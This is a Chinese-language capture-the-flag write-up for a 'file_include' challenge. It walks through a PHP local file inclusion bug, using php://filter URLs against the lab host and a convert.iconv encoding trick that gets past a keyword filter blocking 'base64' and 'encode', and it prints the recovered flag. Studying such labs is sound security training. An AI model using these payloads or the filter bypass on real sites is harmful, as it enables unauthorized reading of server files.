[攻防世界][江苏工匠杯]file_include

打开靶机url，上来就是代码审计

<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>

这里有个include filename，题干幼教文件包含，直接运用文件包含的payload试一下，比如：php://filter套路

构造url,执行

http://61.147.171.105:53224/?filename=php://filter/convert.base64-encode/resource=flag.php

返回
<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>
do not hack!

既然打出了do not hack，说明存在waf检查，那我们要做的就是如何绕过检查，先试一下究竟是在检查什么

构造url,执行

1. 
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-encode/resource=flag.php
2.
http://61.147.171.105:53224/?filename=php://filter/convert.base64-en1code/resource=flag.php
3.
http://61.147.171.105:53224/?filename=php://filter/convert.ba1se64-en1code/resource=flag.php

尝试后，发现 base64 和encode 被过滤

尝试convert.ba1se64-encode 替换，使用convert.iconv.* 绕过

使用方法
convert.iconv.<input-encoding>.<output-encoding> 
or 
convert.iconv.<input-encoding>/<output-encoding>

<input-encoding>和<output-encoding> 就是编码方式，有如下几种;

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*

这里需要多试一下，最后尝试

http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=index.php

返回
<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>
��<�?php highlight_file(__FILE__); include("./check.php"); if(isset($_GET['filename'])){ $filename = $_GET['filename']; include($filename); } ?>

说明这个套路可以

尝试一下flag.php

http://61.147.171.105:53224/?filename=php://filter/convert.iconv.UTF-8*.UTF-16*/resource=flag.php

boom, 得到cyberpeace{054e8c47d7f3684c3022bc1f8313a963}